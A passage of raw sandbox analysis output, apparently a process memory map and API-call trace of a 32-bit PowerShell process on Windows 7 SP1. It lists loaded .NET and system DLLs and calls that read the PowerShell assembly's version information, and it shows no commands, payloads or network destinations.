"mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 1046 start_va = 0x753d0000 end_va = 0x753d8fff entry_point = 0x753d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1047 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1048 start_va = 0x2af0000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 1049 start_va = 0x74bc0000 end_va = 0x74c5afff entry_point = 0x74bc0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 1050 start_va = 0x74c60000 end_va = 0x7520afff entry_point = 0x74c60000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 1051 start_va = 0x5b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1052 start_va = 0x1ee0000 end_va = 0x1ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 1053 start_va = 0x1f30000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 1054 start_va = 0x1f40000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 1055 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1056 start_va = 0x1fa0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1057 start_va = 0x1ff0000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1058 start_va = 0x2000000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1059 start_va = 0x2080000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1060 start_va = 0x2130000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1061 start_va = 0x28a0000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 1062 start_va = 0x2a30000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1063 start_va = 0x2b80000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 1064 start_va = 0x2bc0000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1065 start_va = 0x4c20000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 1066 start_va = 0x4ca0000 end_va = 0x4cdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 1067 start_va = 0x728f0000 end_va = 0x733e7fff entry_point = 0x728f0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 1068 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1069 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1070 start_va = 0x2010000 end_va = 0x201ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1071 start_va = 0x4ce0000 end_va = 0x4fc1fff entry_point = 0x4ce0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1072 start_va = 0x72150000 end_va = 0x728ebfff entry_point = 0x72150000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 1073 start_va = 0x74b30000 end_va = 0x74bb0fff entry_point = 0x74b30000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 1074 start_va = 0x718d0000 end_va = 0x72149fff entry_point = 0x718d0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 1075 start_va = 0x74840000 end_va = 0x74b21fff entry_point = 0x74acec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1076 start_va = 0x74840000 end_va = 0x74b21fff entry_point = 0x74acec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1077 start_va = 0x2020000 end_va = 0x2022fff entry_point = 0x2020000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 1078 start_va = 0x4fd0000 end_va = 0x508ffff entry_point = 0x4fd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1079 start_va = 0x76b30000 end_va = 0x76b34fff entry_point = 0x76b30000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1080 start_va = 0x2030000 end_va = 0x2030fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 1081 start_va = 0x2120000 end_va = 0x2124fff entry_point = 0x2120000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 1082 start_va = 0x2a70000 end_va = 0x2ab0fff entry_point = 0x2a70000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 1083 start_va = 0x74840000 end_va = 0x74b21fff entry_point = 0x74acec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1084 start_va = 0x74840000 end_va = 0x74b21fff entry_point = 0x74acec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1085 start_va = 0x2850000 end_va = 0x2857fff entry_point = 0x2850000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 1086 start_va = 0x29a0000 end_va = 0x29a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 1087 start_va = 0x2b30000 end_va = 0x2b72fff entry_point = 0x2b30000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1088 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67adf03c region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1089 start_va = 0x74450000 end_va = 0x744ebfff entry_point = 0x74450000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 1090 start_va = 0x744f0000 end_va = 0x74574fff entry_point = 0x744f0000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 1091 start_va = 0x74580000 end_va = 0x745a4fff entry_point = 0x74580000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 1092 start_va = 0x745b0000 end_va = 0x745fafff entry_point = 0x745b0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 1093 start_va = 0x74600000 end_va = 0x74834fff entry_point = 0x74600000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 1094 start_va = 0x29f0000 end_va = 0x29f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029f0000" filename = "" Region: id = 1095 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 1096 start_va = 0x73d60000 end_va = 0x73e22fff entry_point = 0x73d60000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 1097 start_va = 0x73e30000 end_va = 0x73fcdfff entry_point = 0x73e30000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 1098 start_va = 0x74230000 end_va = 0x7425cfff entry_point = 0x74230000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 1099 start_va = 0x29f0000 end_va = 0x29fffff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 1100 start_va = 0x4bc0000 end_va = 0x4c13fff entry_point = 0x4bc0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 1101 start_va = 0x71390000 end_va = 0x718c5fff entry_point = 0x71390000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 1102 start_va = 0x73a20000 end_va = 0x73b33fff entry_point = 0x73a20000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 1103 start_va = 0x73b60000 end_va = 0x73c63fff entry_point = 0x73b60000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 1104 start_va = 0x753b0000 end_va = 0x753b4fff entry_point = 0x753b0000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 1105 start_va = 0x5090000 end_va = 0x518ffff entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1106 start_va = 0x2a00000 end_va = 0x2a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 1107 start_va = 0x2a20000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 1108 start_va = 0x2ac0000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 1109 start_va = 0x2ad0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1110 start_va = 0x2ae0000 end_va = 0x2aeffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 1111 start_va = 0x4c60000 end_va = 0x4c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 1112 start_va = 0x4c70000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 1113 start_va = 0x4c80000 end_va = 0x4c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 1114 start_va = 0x4c90000 end_va = 0x4c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 1115 start_va = 0x74440000 end_va = 0x74447fff entry_point = 0x74440000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1116 start_va = 0x5190000 end_va = 0x520ffff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1117 start_va = 0x5210000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 1118 start_va = 0x5220000 end_va = 0x54f1fff entry_point = 0x5220000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1119 start_va = 0x5500000 end_va = 0x5500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005500000" filename = "" Region: id = 1120 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x6511b43c region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1121 start_va = 0x70d30000 end_va = 0x71380fff entry_point = 0x70d30000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 1122 start_va = 0x75820000 end_va = 0x75854fff entry_point = 0x75820000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1123 start_va = 0x776d0000 end_va = 0x776d5fff entry_point = 0x776d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1124 start_va = 0x77740000 end_va = 0x7785cfff entry_point = 0x77740000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1125 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1126 start_va = 0x5510000 end_va = 0x551ffff entry_point = 0x0 region_type = private name = "private_0x0000000005510000" filename = "" Region: id = 1127 start_va = 0x5520000 end_va = 0x5520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005520000" filename = "" Region: id = 1128 start_va = 0x739c0000 end_va = 0x73a1afff entry_point = 0x739c0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 1129 start_va = 0x5530000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 1130 start_va = 0x5540000 end_va = 0x554ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 1131 start_va = 0x5550000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005550000" filename = "" Region: id = 1132 start_va = 0x5560000 end_va = 0x556ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 1133 start_va = 0x5580000 end_va = 0x55bffff entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 1134 start_va = 0x5720000 end_va = 0x60affff entry_point = 0x0 region_type = private name = "private_0x0000000005720000" filename = "" Region: id = 1135 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1136 start_va = 0x5570000 end_va = 0x557ffff entry_point = 0x0 region_type = private name = "private_0x0000000005570000" filename = "" Region: id = 1137 start_va = 0x60b0000 end_va = 0x83dcfff entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 1138 start_va = 0x77370000 end_va = 0x77464fff entry_point = 0x77370000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1139 start_va = 0x77590000 end_va = 0x776c5fff entry_point = 0x77590000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1140 start_va = 0x759a0000 end_va = 0x75b9afff entry_point = 0x759a0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1141 start_va = 0x76b00000 end_va = 0x76b29fff entry_point = 0x76b00000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1142 start_va = 0x55c0000 end_va = 0x564ffff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 1233 start_va = 0x739b0000 end_va = 0x739b8fff entry_point = 0x739b0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 31 os_tid = 0x5c4 [0086.913] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0087.144] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0087.144] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0087.144] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0087.144] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0087.842] GetVersionExW (in: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.842] GetLastError () returned 0x2 [0087.843] GetVersionExW (in: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.843] GetLastError () returned 0x2 [0087.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.847] GetLastError () returned 0x2 [0087.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.851] GetLastError () returned 0x2 [0087.851] GetVersionExW (in: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.851] GetLastError () returned 0x2 [0087.852] SetErrorMode (uMode=0x1) returned 0x1 [0087.853] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x13e9b8 | out: lpFileInformation=0x13e9b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0087.853] GetLastError () returned 0x2 [0087.853] SetErrorMode (uMode=0x1) returned 0x1 [0087.855] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x13ea3c | out: lpdwHandle=0x13ea3c) returned 0x94c [0087.858] GetLastError () returned 0x0 [0087.859] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc4d28 | out: lpData=0x2bc4d28) returned 1 [0087.862] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13ea08, puLen=0x13ea04 | out: lplpBuffer=0x13ea08*=0x2bc4dc4, puLen=0x13ea04) returned 1 [0087.864] lstrlenW (lpString="䅁") returned 1 [0087.874] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc4ea0, puLen=0x13e980) returned 1 [0087.874] lstrlenW (lpString="Microsoft Corporation") returned 21 